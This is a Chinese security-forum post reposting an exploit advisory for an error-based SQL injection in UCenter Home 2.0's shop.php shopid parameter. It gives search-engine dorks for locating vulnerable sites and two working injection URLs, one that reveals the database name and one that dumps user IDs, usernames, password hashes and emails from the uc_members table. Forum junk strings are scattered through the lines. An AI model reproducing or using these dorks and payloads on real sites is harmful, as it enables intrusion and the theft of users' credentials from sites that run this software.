找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2138|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

" ~$ R6 ^2 N5 W+ b- w__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  
6 n* D7 v- y8 G# C. g9 U
* Y' k# _% k3 e* Y0 L; ]/ _                                 
9 ~% b, }2 u% T# u' C! o
$ P' a3 F% s# q+ t5 N" ?*/ Author : KnocKout  7 v; F& K( a, P9 v
  P6 N' G% Y- x3 h* Y
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  
. U4 Y3 G* i8 @5 G/ E9 E
% B8 E( y* h" m3 n: [*/ Contact: knockoutr@msn.com  : ~, d% d6 |% L. @" S; q+ S0 s
9 r: p/ @! k/ \+ |: C' q$ b, y
*/ Cyber-Warrior.org/CWKnocKout  
" F, e' d  ~8 V5 B2 x7 K" p3 s, O; F7 b" R7 K7 }5 F1 o: k& B/ p- }" ?8 {
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  $ _) e. c) v( N
& i* m) k) q  |) V- O
Script : UCenter Home  7 ^# h$ N) M+ g8 f! v

/ D# E! F1 [5 w6 q5 V* R0 L7 HVersion : 2.0  ' J4 W1 j* P3 O: Q& X

4 M5 y  P  x; x1 EScript HomePage : http://u.discuz.net/  
3 j. H, j* Y+ r
: k% \5 y& N8 U1 q' G, @__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
- `  D# A& U/ A7 y! }4 o9 z$ m* N) t9 |7 `2 z8 R6 q, [& @5 Y
Dork : Powered by UCenter inurl:shop.php?ac=view  
/ X2 ]5 m' c8 p! X4 x' m% l8 J9 P4 z4 w; }6 p
Dork 2 : inurl:shop.php?ac=view&shopid=  
0 y, r/ s. ]5 N- v9 J  h# |3 W( h) f7 _' a7 q
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
/ B5 _, L. A! ]8 m- H: L6 y$ O7 ^) y! b) w5 }
Vuln file : Shop.php  
5 H3 w2 y& O  @2 T' l( e
+ ?* e: ~- x' M% ^2 Zvalue's : (?)ac=view&shopid=  / L& D" s2 g6 X" O
- |5 K+ p9 F5 c) G: ?
Vulnerable Style : SQL Injection (MySQL Error Based)  : }" t5 Z6 p( P; o7 b  B9 p
  O) D5 G1 Y2 E8 M  R" h
Need Metarials : Hex Conversion  
1 G; p- E# f% \/ M% T0 ?* j, w' P' p/ O# c3 P
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
! A" x/ ?! d& {3 U
( H( i. P/ I1 W7 G6 x8 uYour Need victim Database name.   5 v/ d1 j: ~3 ?% x$ o5 A* I
( {& J6 A( R& z2 Y* H% J
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  + l% X% P5 d2 z0 e! x) |  Q2 K
+ g2 [: }, y4 e  M! |7 b+ x+ w( A
..  
) T6 h( d# n$ y/ L, ~: v7 D9 E2 P# I* T' w& R# b
DB : Okey.  6 T/ A' H1 d) Y0 L0 r3 \

' m7 d- [7 T& h4 l1 \your edit DB `[TARGET DB NAME]`  
( \4 V( s0 ~% `0 G! }! `. a5 o3 Q" Q* l
Example : 'hiwir1_ucenter'  
: T3 y; [2 g8 a" u9 q
9 s7 X  m6 I3 W8 SEdit : Okey.  " q7 Y1 d4 r: b+ n& g  k  W7 B

/ L2 Y* }5 u( G, `Your use Hex conversion. And edit Your SQL Injection Exploit..  
/ d' q- G! k: b! L0 L
! [  p. m+ [& m* A$ x* T   
- v: z0 N2 B0 P4 ~! _) A# p/ V4 g. I5 L, H
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  0 u# N( z. p9 Y: A2 m2 S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表